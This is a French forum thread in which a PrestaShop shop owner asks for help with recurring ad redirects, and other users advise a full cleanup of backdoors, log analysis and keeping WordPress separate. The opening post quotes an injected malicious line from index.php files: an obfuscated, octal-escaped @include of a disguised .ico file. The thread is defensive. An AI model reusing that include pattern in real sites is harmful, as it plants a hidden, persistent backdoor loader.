Trojan sur Prestashop

[Will_presta]

Bonjour j'ai une boutique Prestashop et mon site redirige de temps en temps sur des sites publicitaires.

Dans certain fichiers index.php j'ai le code suivant qui c'est ajouté : 

@include "\057home\057inti\155ufrq\172/www\057soin\057modu\154es/p\163_sho\160ping\143art/\056ee23\0619e4.\151co";

Cela pointe vers un fichier .ico que j'ai supprimé et j'au tout supprimé tous les codes ajoutés mais c'est de retour aujourd'hui.

Le prestashop se trouve dans Wordpress qui est lui même infecté par le même code.

Mes questions :

- Une solution pour éviter que ce fichier .ico ne revienne ? 

- Pensez-vous que le wordpress est la source du problème ? Si oui, le include est sous la forme @include et je pense que c'est prestashop qui utilise ces includes et non pas Wordpress.

Merci pour votre aide

[doekia]

Faites un nettoyage de hack complet. Trouver les portes dérobées que les hacker ont mises en place et les supprimer.

[Will_presta]

Merci , je n'avais pas pensé à enlever le hack..... si je demande sur le forum c'est justement pour voir si des personnes ont le même problème et peut-être à cause d'un module particulier.

[Eolia]

Ne jamais installer un WP sur le même espace qu'un Prestashop, WP est le cms le plus attaqué au monde.

Nous avons une liste non-exhaustive des modules comportant une faille ici https://bb.enter-solutions.net/topic/1075/des-modules-et-des-hacks-liste-non-exhaustive-des-modules-présentant-un-risque mais pas concernant les plugins WP

Enlever le hack ne suffit pas comme vous dites, il faut supprimer tous les fichiers ajoutés un peu partout (le principe de ces hacks étant justement de multiplier les points d'entrées possibles), corriger ou remettre à l'origine les fichiers modifiés, analyser les logs d'accès et d'erreur pour trouver l'origine principale.